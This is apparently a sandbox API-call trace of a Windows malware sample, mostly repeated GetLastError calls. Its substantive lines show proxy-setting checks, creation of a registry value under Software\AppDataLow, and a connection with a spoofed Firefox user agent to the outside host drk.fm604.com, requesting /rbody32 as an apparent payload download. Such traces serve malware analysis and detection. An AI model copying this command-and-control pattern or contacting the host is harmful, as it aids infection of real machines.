	[0072.002] GetLastError () returned 0x0
	[0072.002] GetLastError () returned 0x0
	[0072.002] GetLastError () returned 0x0
	[0072.002] GetLastError () returned 0x0
	[0072.002] GetLastError () returned 0x0
	[0072.002] GetLastError () returned 0x0
	[0072.002] GetLastError () returned 0x0
	[0072.003] GetLastError () returned 0x0
	[0072.003] GetLastError () returned 0x0
	[0072.003] GetLastError () returned 0x0
	[0072.003] GetLastError () returned 0x0
	[0072.003] GetLastError () returned 0x0
	[0072.003] GetLastError () returned 0x0
	[0072.003] GetLastError () returned 0x0
	[0072.003] GetLastError () returned 0x0
	[0072.003] GetLastError () returned 0x0
	[0072.003] GetLastError () returned 0x0
	[0072.003] GetLastError () returned 0x0
	[0072.003] GetLastError () returned 0x0
	[0072.003] GetLastError () returned 0x0
	[0072.003] GetLastError () returned 0x0
	[0072.003] GetLastError () returned 0x0
	[0072.003] GetLastError () returned 0x0
	[0072.003] GetLastError () returned 0x0
	[0072.003] GetLastError () returned 0x0
	[0072.003] GetLastError () returned 0x0
	[0072.003] GetLastError () returned 0x0
	[0072.003] GetLastError () returned 0x0
	[0072.003] GetLastError () returned 0x0
	[0072.003] GetLastError () returned 0x0
	[0072.003] GetLastError () returned 0x0
	[0072.003] GetLastError () returned 0x0
	[0072.003] GetLastError () returned 0x0
	[0072.003] GetLastError () returned 0x0
	[0072.003] GetLastError () returned 0x0
	[0072.003] GetLastError () returned 0x0
	[0072.003] GetLastError () returned 0x0
	[0072.003] GetLastError () returned 0x0
	[0072.003] GetLastError () returned 0x0
	[0072.003] GetLastError () returned 0x0
	[0072.003] GetLastError () returned 0x0
	[0072.003] GetLastError () returned 0x0
	[0072.003] GetLastError () returned 0x0
	[0072.003] GetLastError () returned 0x0
	[0072.003] GetLastError () returned 0x0
	[0072.003] GetLastError () returned 0x0
	[0072.003] GetLastError () returned 0x0
	[0072.003] GetLastError () returned 0x0
	[0072.003] GetLastError () returned 0x0
	[0072.003] lstrlenW (lpString="X-HTTP-Agent: WININET") returned 21
	[0072.003] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-HTTP-Agent: WININET", dwHeadersLength=0x15, dwModifiers=0x10000000) returned 1
	[0072.003] GetLastError () returned 0x0
	[0072.003] GetLastError () returned 0x0
	[0072.003] GetLastError () returned 0x0
	[0072.003] GetLastError () returned 0x0
	[0072.003] GetLastError () returned 0x0
	[0072.003] GetLastError () returned 0x0
	[0072.003] GetLastError () returned 0x0
	[0072.003] GetLastError () returned 0x0
	[0072.003] GetLastError () returned 0x0
	[0072.003] GetLastError () returned 0x0
	[0072.003] GetLastError () returned 0x0
	[0072.003] GetLastError () returned 0x0
	[0072.003] GetLastError () returned 0x0
	[0072.003] GetLastError () returned 0x0
	[0072.004] GetLastError () returned 0x0
	[0072.004] GetLastError () returned 0x0
	[0072.004] GetLastError () returned 0x0
	[0072.004] GetLastError () returned 0x0
	[0072.004] GetLastError () returned 0x0
	[0072.004] GetLastError () returned 0x0
	[0072.004] GetLastError () returned 0x0
	[0072.004] GetLastError () returned 0x0
	[0072.004] GetLastError () returned 0x0
	[0072.004] GetLastError () returned 0x0
	[0072.004] GetLastError () returned 0x0
	[0072.004] GetLastError () returned 0x0
	[0072.004] GetLastError () returned 0x0
	[0072.004] GetLastError () returned 0x0
	[0072.004] GetLastError () returned 0x0
	[0072.004] GetLastError () returned 0x0
	[0072.004] GetLastError () returned 0x0
	[0072.004] GetLastError () returned 0x0
	[0072.004] GetLastError () returned 0x0
	[0072.004] GetLastError () returned 0x0
	[0072.004] GetLastError () returned 0x0
	[0072.004] GetLastError () returned 0x0
	[0072.004] GetLastError () returned 0x0
	[0072.004] GetLastError () returned 0x0
	[0072.004] GetLastError () returned 0x0
	[0072.004] GetLastError () returned 0x0
	[0072.004] GetLastError () returned 0x0
	[0072.004] GetLastError () returned 0x0
	[0072.004] GetLastError () returned 0x0
	[0072.004] GetLastError () returned 0x0
	[0072.004] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-Proxy-Present: FALSE", dwHeadersLength=0x16, dwModifiers=0x10000000) returned 1
	[0072.004] lstrlenW (lpString="X-Proxy-Used: FALSE") returned 19
	[0072.004] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-Proxy-Used: FALSE", dwHeadersLength=0x13, dwModifiers=0x10000000) returned 1
	[0072.004] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x247f300 | out: phkResult=0x247f300*=0x27c) returned 0x0
	[0072.004] RegQueryValueExW (in: hKey=0x27c, lpValueName="AutoDetect", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x247f304*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x247f304*=0x0) returned 0x2
	[0072.004] RegCloseKey (hKey=0x27c) returned 0x0
	[0072.005] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-Proxy-AutoDetect: FALSE", dwHeadersLength=0x19, dwModifiers=0x10000000) returned 1
	[0072.005] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x247fb54, lpdwBufferLength=0x247fb34 | out: lpBuffer=0x247fb54, lpdwBufferLength=0x247fb34) returned 1
	[0072.005] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x247fb54, dwBufferLength=0x4) returned 1
	[0072.005] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0 | out: lpOptional=0x0*) returned 1
	[0074.252] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x247fb5c, lpdwBufferLength=0x247fb60, lpdwIndex=0x0 | out: lpBuffer=0x247fb5c*, lpdwBufferLength=0x247fb60*=0x4, lpdwIndex=0x0) returned 1
	[0074.252] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000005, lpBuffer=0x247fcac, lpdwBufferLength=0x247fb60, lpdwIndex=0x0 | out: lpBuffer=0x247fcac*, lpdwBufferLength=0x247fb60*=0x4, lpdwIndex=0x0) returned 1
	[0074.252] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f92c, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fca0 | out: lpBuffer=0x247f92c*, lpdwNumberOfBytesRead=0x247fca0*=0x4) returned 1
	[0074.252] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x247f92c, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x247fca0 | out: lpBuffer=0x247f92c*, lpdwNumberOfBytesRead=0x247fca0*=0x0) returned 1
	[0074.252] InternetCloseHandle (hInternet=0xcc000c) returned 1
	[0074.252] InternetCloseHandle (hInternet=0xcc0008) returned 1
	[0074.252] InternetCloseHandle (hInternet=0xcc0004) returned 1
	[0074.253] GetLastError () returned 0x0
	[0074.253] GetLastError () returned 0x0
	[0074.253] GetLastError () returned 0x0
	[0074.253] GetLastError () returned 0x0
	[0074.253] GetLastError () returned 0x0
	[0074.253] GetLastError () returned 0x0
	[0074.253] GetLastError () returned 0x0
	[0074.253] GetLastError () returned 0x0
	[0074.253] GetLastError () returned 0x0
	[0074.253] GetLastError () returned 0x0
	[0074.253] GetLastError () returned 0x0
	[0074.253] GetLastError () returned 0x0
	[0074.253] GetLastError () returned 0x0
	[0074.253] GetLastError () returned 0x0
	[0074.253] GetLastError () returned 0x0
	[0074.253] GetLastError () returned 0x0
	[0074.253] GetLastError () returned 0x0
	[0074.253] GetLastError () returned 0x0
	[0074.253] GetLastError () returned 0x0
	[0074.253] GetLastError () returned 0x0
	[0074.253] GetLastError () returned 0x0
	[0074.253] GetLastError () returned 0x0
	[0074.253] GetLastError () returned 0x0
	[0074.253] GetLastError () returned 0x0
	[0074.253] GetLastError () returned 0x0
	[0074.253] GetLastError () returned 0x0
	[0074.253] GetLastError () returned 0x0
	[0074.253] GetLastError () returned 0x0
	[0074.253] GetLastError () returned 0x0
	[0074.253] GetLastError () returned 0x0
	[0074.253] GetLastError () returned 0x0
	[0074.253] GetLastError () returned 0x0
	[0074.253] GetLastError () returned 0x0
	[0074.253] GetLastError () returned 0x0
	[0074.253] GetLastError () returned 0x0
	[0074.253] GetLastError () returned 0x0
	[0074.253] GetLastError () returned 0x0
	[0074.253] GetLastError () returned 0x0
	[0074.253] GetLastError () returned 0x0
	[0074.253] GetLastError () returned 0x0
	[0074.253] GetLastError () returned 0x0
	[0074.253] GetLastError () returned 0x0
	[0074.253] GetLastError () returned 0x0
	[0074.253] GetLastError () returned 0x0
	[0074.254] GetLastError () returned 0x0
	[0074.254] GetLastError () returned 0x0
	[0074.254] GetLastError () returned 0x0
	[0074.254] GetLastError () returned 0x0
	[0074.254] GetLastError () returned 0x0
	[0074.254] GetLastError () returned 0x0
	[0074.254] GetLastError () returned 0x0
	[0074.254] GetLastError () returned 0x0
	[0074.254] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77960000
	[0074.254] GetProcAddress (hModule=0x77960000, lpProcName="RtlComputeCrc32") returned 0x77a2d9b0
	[0074.254] GetLastError () returned 0x0
	[0074.254] GetLastError () returned 0x0
	[0074.254] GetLastError () returned 0x0
	[0074.254] GetLastError () returned 0x0
	[0074.254] GetLastError () returned 0x0
	[0074.254] GetLastError () returned 0x0
	[0074.254] GetLastError () returned 0x0
	[0074.254] GetLastError () returned 0x0
	[0074.254] GetLastError () returned 0x0
	[0074.254] GetLastError () returned 0x0
	[0074.254] GetLastError () returned 0x0
	[0074.254] GetLastError () returned 0x0
	[0074.254] GetLastError () returned 0x0
	[0074.254] GetLastError () returned 0x0
	[0074.254] GetLastError () returned 0x0
	[0074.254] GetLastError () returned 0x0
	[0074.254] GetLastError () returned 0x0
	[0074.254] GetLastError () returned 0x0
	[0074.254] GetLastError () returned 0x0
	[0074.254] GetLastError () returned 0x0
	[0074.254] GetLastError () returned 0x0
	[0074.254] GetLastError () returned 0x0
	[0074.254] GetLastError () returned 0x0
	[0074.254] GetLastError () returned 0x0
	[0074.255] GetLastError () returned 0x0
	[0074.255] GetLastError () returned 0x0
	[0074.255] GetLastError () returned 0x0
	[0074.255] GetLastError () returned 0x0
	[0074.255] GetLastError () returned 0x0
	[0074.255] GetLastError () returned 0x0
	[0074.255] GetLastError () returned 0x0
	[0074.255] GetLastError () returned 0x0
	[0074.255] GetLastError () returned 0x0
	[0074.255] GetLastError () returned 0x0
	[0074.255] GetLastError () returned 0x0
	[0074.255] GetLastError () returned 0x0
	[0074.255] GetLastError () returned 0x0
	[0074.255] GetLastError () returned 0x0
	[0074.255] GetLastError () returned 0x0
	[0074.255] GetLastError () returned 0x0
	[0074.255] GetLastError () returned 0x0
	[0074.255] GetLastError () returned 0x0
	[0074.255] GetLastError () returned 0x0
	[0074.255] GetLastError () returned 0x0
	[0074.255] GetLastError () returned 0x0
	[0074.255] GetLastError () returned 0x0
	[0074.255] GetLastError () returned 0x0
	[0074.255] GetLastError () returned 0x0
	[0074.255] GetLastError () returned 0x0
	[0074.255] GetLastError () returned 0x0
	[0074.255] GetLastError () returned 0x0
	[0074.255] GetLastError () returned 0x0
	[0074.255] GetLastError () returned 0x0
	[0074.255] GetLastError () returned 0x0
	[0074.255] GetLastError () returned 0x0
	[0074.255] GetLastError () returned 0x0
	[0074.255] GetLastError () returned 0x0
	[0074.255] GetLastError () returned 0x0
	[0074.255] GetLastError () returned 0x0
	[0074.255] GetLastError () returned 0x0
	[0074.255] GetLastError () returned 0x0
	[0074.255] GetLastError () returned 0x0
	[0074.255] GetLastError () returned 0x0
	[0074.255] GetLastError () returned 0x0
	[0074.255] GetLastError () returned 0x0
	[0074.255] GetLastError () returned 0x0
	[0074.255] GetLastError () returned 0x0
	[0074.255] GetLastError () returned 0x0
	[0074.255] GetLastError () returned 0x0
	[0074.255] GetLastError () returned 0x0
	[0074.255] GetLastError () returned 0x0
	[0074.255] GetLastError () returned 0x0
	[0074.255] GetLastError () returned 0x0
	[0074.255] GetLastError () returned 0x0
	[0074.255] GetLastError () returned 0x0
	[0074.255] GetLastError () returned 0x0
	[0074.255] GetLastError () returned 0x0
	[0074.255] GetLastError () returned 0x0
	[0074.255] GetLastError () returned 0x0
	[0074.255] GetLastError () returned 0x0
	[0074.255] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x247fcb8, lpdwDisposition=0x0 | out: phkResult=0x247fcb8*=0x238, lpdwDisposition=0x0) returned 0x0
	[0074.255] GetLastError () returned 0x0
	[0074.256] GetLastError () returned 0x0
	[0074.256] GetLastError () returned 0x0
	[0074.256] GetLastError () returned 0x0
	[0074.256] GetLastError () returned 0x0
	[0074.256] GetLastError () returned 0x0
	[0074.256] GetLastError () returned 0x0
	[0074.256] GetLastError () returned 0x0
	[0074.256] GetLastError () returned 0x0
	[0074.256] GetLastError () returned 0x0
	[0074.256] GetLastError () returned 0x0
	[0074.256] GetLastError () returned 0x0
	[0074.256] GetLastError () returned 0x0
	[0074.256] GetLastError () returned 0x0
	[0074.256] GetLastError () returned 0x0
	[0074.256] GetLastError () returned 0x0
	[0074.256] GetLastError () returned 0x0
	[0074.256] GetLastError () returned 0x0
	[0074.256] GetLastError () returned 0x0
	[0074.256] GetLastError () returned 0x0
	[0074.256] GetLastError () returned 0x0
	[0074.256] GetLastError () returned 0x0
	[0074.256] GetLastError () returned 0x0
	[0074.256] GetLastError () returned 0x0
	[0074.256] wsprintfW (in: param_1=0x247fcdc, param_2="%s_%d" | out: param_1="gpscsdch_0") returned 10
	[0074.256] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x247fc8c, lpdwDisposition=0x0 | out: phkResult=0x247fc8c*=0x23c, lpdwDisposition=0x0) returned 0x0
	[0074.256] RegQueryValueExW (in: hKey=0x23c, lpValueName="gpscsdch_0", lpReserved=0x0, lpType=0x247fc80, lpData=0x0, lpcbData=0x247fc8c*=0x0 | out: lpType=0x247fc80*=0x0, lpData=0x0, lpcbData=0x247fc8c*=0x0) returned 0x2
	[0074.256] RegCloseKey (hKey=0x23c) returned 0x0
	[0074.256] RegCloseKey (hKey=0x238) returned 0x0
	[0074.256] GetLastError () returned 0x0
	[0074.256] GetLastError () returned 0x0
	[0074.256] GetLastError () returned 0x0
	[0074.256] GetLastError () returned 0x0
	[0074.256] GetLastError () returned 0x0
	[0074.256] GetLastError () returned 0x0
	[0074.256] GetLastError () returned 0x0
	[0074.256] GetLastError () returned 0x0
	[0074.256] GetLastError () returned 0x0
	[0074.256] GetLastError () returned 0x0
	[0074.256] GetLastError () returned 0x0
	[0074.256] GetLastError () returned 0x0
	[0074.256] GetLastError () returned 0x0
	[0074.256] GetLastError () returned 0x0
	[0074.256] GetLastError () returned 0x0
	[0074.256] GetLastError () returned 0x0
	[0074.256] GetLastError () returned 0x0
	[0074.256] GetLastError () returned 0x0
	[0074.257] GetLastError () returned 0x0
	[0074.257] GetLastError () returned 0x0
	[0074.257] GetLastError () returned 0x0
	[0074.257] GetLastError () returned 0x0
	[0074.257] GetLastError () returned 0x0
	[0074.257] GetLastError () returned 0x0
	[0074.257] GetLastError () returned 0x0
	[0074.257] GetLastError () returned 0x0
	[0074.257] GetLastError () returned 0x0
	[0074.257] GetLastError () returned 0x0
	[0074.257] GetLastError () returned 0x0
	[0074.257] GetLastError () returned 0x0
	[0074.257] GetLastError () returned 0x0
	[0074.257] GetLastError () returned 0x0
	[0074.257] GetLastError () returned 0x0
	[0074.257] GetLastError () returned 0x0
	[0074.257] GetLastError () returned 0x0
	[0074.257] GetLastError () returned 0x0
	[0074.257] GetLastError () returned 0x0
	[0074.257] GetLastError () returned 0x0
	[0074.257] GetLastError () returned 0x0
	[0074.257] GetLastError () returned 0x0
	[0074.257] GetLastError () returned 0x0
	[0074.257] GetLastError () returned 0x0
	[0074.257] GetLastError () returned 0x0
	[0074.257] GetLastError () returned 0x0
	[0074.257] GetLastError () returned 0x0
	[0074.257] GetLastError () returned 0x0
	[0074.257] GetLastError () returned 0x0
	[0074.257] GetLastError () returned 0x0
	[0074.257] GetLastError () returned 0x0
	[0074.257] GetLastError () returned 0x0
	[0074.257] GetLastError () returned 0x0
	[0074.257] GetLastError () returned 0x0
	[0074.257] GetLastError () returned 0x0
	[0074.257] GetLastError () returned 0x0
	[0074.257] GetLastError () returned 0x0
	[0074.257] GetLastError () returned 0x0
	[0074.257] GetLastError () returned 0x0
	[0074.257] GetLastError () returned 0x0
	[0074.257] GetLastError () returned 0x0
	[0074.257] GetLastError () returned 0x0
	[0074.257] GetLastError () returned 0x0
	[0074.257] GetLastError () returned 0x0
	[0074.257] GetLastError () returned 0x0
	[0074.257] GetLastError () returned 0x0
	[0074.257] GetLastError () returned 0x0
	[0074.257] GetLastError () returned 0x0
	[0074.257] GetLastError () returned 0x0
	[0074.257] GetLastError () returned 0x0
	[0074.257] GetLastError () returned 0x0
	[0074.257] GetLastError () returned 0x0
	[0074.257] GetLastError () returned 0x0
	[0074.257] GetLastError () returned 0x0
	[0074.257] GetLastError () returned 0x0
	[0074.257] GetLastError () returned 0x0
	[0074.257] GetLastError () returned 0x0
	[0074.257] GetLastError () returned 0x0
	[0074.257] GetLastError () returned 0x0
	[0074.257] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.258] GetLastError () returned 0x0
	[0074.259] GetLastError () returned 0x0
	[0074.259] GetLastError () returned 0x0
	[0074.259] GetLastError () returned 0x0
	[0074.259] GetLastError () returned 0x0
	[0074.259] GetLastError () returned 0x0
	[0074.259] GetLastError () returned 0x0
	[0074.259] GetLastError () returned 0x0
	[0074.259] GetLastError () returned 0x0
	[0074.259] GetLastError () returned 0x0
	[0074.259] GetLastError () returned 0x0
	[0074.259] GetLastError () returned 0x0
	[0074.259] GetLastError () returned 0x0
	[0074.259] GetLastError () returned 0x0
	[0074.259] GetLastError () returned 0x0
	[0074.259] GetLastError () returned 0x0
	[0074.259] GetLastError () returned 0x0
	[0074.259] GetLastError () returned 0x0
	[0074.259] GetLastError () returned 0x0
	[0074.259] GetLastError () returned 0x0
	[0074.259] GetLastError () returned 0x0
	[0074.259] GetLastError () returned 0x0
	[0074.259] GetLastError () returned 0x0
	[0074.259] GetLastError () returned 0x0
	[0074.259] GetLastError () returned 0x0
	[0074.259] GetLastError () returned 0x0
	[0074.259] GetLastError () returned 0x0
	[0074.259] GetLastError () returned 0x0
	[0074.259] GetLastError () returned 0x0
	[0074.259] GetLastError () returned 0x0
	[0074.259] GetLastError () returned 0x0
	[0074.259] GetLastError () returned 0x0
	[0074.259] GetLastError () returned 0x0
	[0074.259] GetLastError () returned 0x0
	[0074.259] GetLastError () returned 0x0
	[0074.259] GetLastError () returned 0x0
	[0074.259] GetLastError () returned 0x0
	[0074.259] GetLastError () returned 0x0
	[0074.259] GetLastError () returned 0x0
	[0074.259] GetLastError () returned 0x0
	[0074.259] GetLastError () returned 0x0
	[0074.259] GetLastError () returned 0x0
	[0074.259] GetLastError () returned 0x0
	[0074.259] GetLastError () returned 0x0
	[0074.259] GetLastError () returned 0x0
	[0074.259] GetLastError () returned 0x0
	[0074.259] GetLastError () returned 0x0
	[0074.259] GetLastError () returned 0x0
	[0074.259] GetLastError () returned 0x0
	[0074.259] GetLastError () returned 0x0
	[0074.259] GetLastError () returned 0x0
	[0074.259] GetLastError () returned 0x0
	[0074.259] GetLastError () returned 0x0
	[0074.259] GetLastError () returned 0x0
	[0074.259] GetLastError () returned 0x0
	[0074.259] GetLastError () returned 0x0
	[0074.259] GetLastError () returned 0x0
	[0074.259] GetLastError () returned 0x0
	[0074.259] GetLastError () returned 0x0
	[0074.259] GetLastError () returned 0x0
	[0074.259] GetLastError () returned 0x0
	[0074.259] GetLastError () returned 0x0
	[0074.259] GetLastError () returned 0x0
	[0074.259] GetLastError () returned 0x0
	[0074.259] GetLastError () returned 0x0
	[0074.259] GetLastError () returned 0x0
	[0074.260] GetLastError () returned 0x0
	[0074.260] GetLastError () returned 0x0
	[0074.260] GetLastError () returned 0x0
	[0074.260] GetLastError () returned 0x0
	[0074.260] GetLastError () returned 0x0
	[0074.260] GetLastError () returned 0x0
	[0074.260] GetLastError () returned 0x0
	[0074.260] GetLastError () returned 0x0
	[0074.260] GetLastError () returned 0x0
	[0074.260] GetLastError () returned 0x0
	[0074.260] GetLastError () returned 0x0
	[0074.260] GetLastError () returned 0x0
	[0074.260] GetLastError () returned 0x0
	[0074.260] GetLastError () returned 0x0
	[0074.260] GetLastError () returned 0x0
	[0074.260] GetLastError () returned 0x0
	[0074.260] GetLastError () returned 0x0
	[0074.260] GetLastError () returned 0x0
	[0074.260] GetLastError () returned 0x0
	[0074.260] GetLastError () returned 0x0
	[0074.260] GetLastError () returned 0x0
	[0074.260] GetLastError () returned 0x0
	[0074.260] GetLastError () returned 0x0
	[0074.260] GetLastError () returned 0x0
	[0074.260] GetLastError () returned 0x0
	[0074.260] GetLastError () returned 0x0
	[0074.260] GetLastError () returned 0x0
	[0074.260] GetLastError () returned 0x0
	[0074.260] GetLastError () returned 0x0
	[0074.260] GetLastError () returned 0x0
	[0074.260] GetLastError () returned 0x0
	[0074.260] GetLastError () returned 0x0
	[0074.260] GetLastError () returned 0x0
	[0074.260] GetLastError () returned 0x0
	[0074.260] GetLastError () returned 0x0
	[0074.260] GetLastError () returned 0x0
	[0074.260] GetLastError () returned 0x0
	[0074.260] GetLastError () returned 0x0
	[0074.260] GetLastError () returned 0x0
	[0074.260] GetLastError () returned 0x0
	[0074.260] GetLastError () returned 0x0
	[0074.260] GetLastError () returned 0x0
	[0074.260] GetLastError () returned 0x0
	[0074.260] GetLastError () returned 0x0
	[0074.260] GetLastError () returned 0x0
	[0074.260] GetLastError () returned 0x0
	[0074.260] GetLastError () returned 0x0
	[0074.260] GetLastError () returned 0x0
	[0074.261] GetLastError () returned 0x0
	[0074.261] GetLastError () returned 0x0
	[0074.261] GetLastError () returned 0x0
	[0074.261] GetLastError () returned 0x0
	[0074.261] GetLastError () returned 0x0
	[0074.261] GetLastError () returned 0x0
	[0074.261] GetLastError () returned 0x0
	[0074.261] GetLastError () returned 0x0
	[0074.261] GetLastError () returned 0x0
	[0074.261] GetLastError () returned 0x0
	[0074.261] GetLastError () returned 0x0
	[0074.261] GetLastError () returned 0x0
	[0074.261] GetLastError () returned 0x0
	[0074.261] GetLastError () returned 0x0
	[0074.261] GetLastError () returned 0x0
	[0074.261] GetLastError () returned 0x0
	[0074.261] GetLastError () returned 0x0
	[0074.261] GetLastError () returned 0x0
	[0074.261] GetLastError () returned 0x0
	[0074.261] GetLastError () returned 0x0
	[0074.261] GetLastError () returned 0x0
	[0074.261] GetLastError () returned 0x0
	[0074.261] GetLastError () returned 0x0
	[0074.261] GetLastError () returned 0x0
	[0074.261] GetLastError () returned 0x0
	[0074.261] GetLastError () returned 0x0
	[0074.261] GetLastError () returned 0x0
	[0074.261] GetLastError () returned 0x0
	[0074.261] GetLastError () returned 0x0
	[0074.261] GetLastError () returned 0x0
	[0074.261] GetLastError () returned 0x0
	[0074.261] GetLastError () returned 0x0
	[0074.261] GetLastError () returned 0x0
	[0074.261] GetLastError () returned 0x0
	[0074.261] GetLastError () returned 0x0
	[0074.261] GetLastError () returned 0x0
	[0074.261] GetLastError () returned 0x0
	[0074.261] GetLastError () returned 0x0
	[0074.261] GetLastError () returned 0x0
	[0074.261] GetLastError () returned 0x0
	[0074.261] GetLastError () returned 0x0
	[0074.261] GetLastError () returned 0x0
	[0074.261] GetLastError () returned 0x0
	[0074.261] GetLastError () returned 0x0
	[0074.261] GetLastError () returned 0x0
	[0074.261] GetLastError () returned 0x0
	[0074.261] GetLastError () returned 0x0
	[0074.261] GetLastError () returned 0x0
	[0074.261] GetLastError () returned 0x0
	[0074.261] GetLastError () returned 0x0
	[0074.261] GetLastError () returned 0x0
	[0074.261] GetLastError () returned 0x0
	[0074.261] GetLastError () returned 0x0
	[0074.261] GetLastError () returned 0x0
	[0074.261] GetLastError () returned 0x0
	[0074.261] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x247f95c | out: phkResult=0x247f95c*=0x238) returned 0x0
	[0074.261] RegQueryValueExW (in: hKey=0x238, lpValueName="ProxyEnable", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x247f960*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x247f960*=0x4) returned 0x0
	[0074.262] RegQueryValueExW (in: hKey=0x238, lpValueName="ProxyEnable", lpReserved=0x0, lpType=0x0, lpData=0x31e6910, lpcbData=0x247f960*=0x4 | out: lpType=0x0, lpData=0x31e6910*=0x0, lpcbData=0x247f960*=0x4) returned 0x0
	[0074.262] RegCloseKey (hKey=0x238) returned 0x0
	[0074.262] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/21000101 Firefox/25.0", dwAccessType=0x1, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
	[0074.262] InternetConnectA (hInternet=0xcc0004, lpszServerName="drk.fm604.com", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008
	[0074.262] GetLastError () returned 0x0
	[0074.262] GetLastError () returned 0x0
	[0074.262] GetLastError () returned 0x0
	[0074.262] GetLastError () returned 0x0
	[0074.262] GetLastError () returned 0x0
	[0074.262] GetLastError () returned 0x0
	[0074.262] GetLastError () returned 0x0
	[0074.262] GetLastError () returned 0x0
	[0074.262] GetLastError () returned 0x0
	[0074.262] GetLastError () returned 0x0
	[0074.262] GetLastError () returned 0x0
	[0074.262] GetLastError () returned 0x0
	[0074.262] GetLastError () returned 0x0
	[0074.262] GetLastError () returned 0x0
	[0074.262] GetLastError () returned 0x0
	[0074.262] GetLastError () returned 0x0
	[0074.262] GetLastError () returned 0x0
	[0074.262] GetLastError () returned 0x0
	[0074.262] GetLastError () returned 0x0
	[0074.262] GetLastError () returned 0x0
	[0074.262] GetLastError () returned 0x0
	[0074.262] GetLastError () returned 0x0
	[0074.262] GetLastError () returned 0x0
	[0074.262] GetLastError () returned 0x0
	[0074.262] GetLastError () returned 0x0
	[0074.262] GetLastError () returned 0x0
	[0074.262] GetLastError () returned 0x0
	[0074.262] GetLastError () returned 0x0
	[0074.262] GetLastError () returned 0x0
	[0074.262] GetLastError () returned 0x0
	[0074.262] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/rbody32", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84800300, dwContext=0x0) returned 0xcc000c
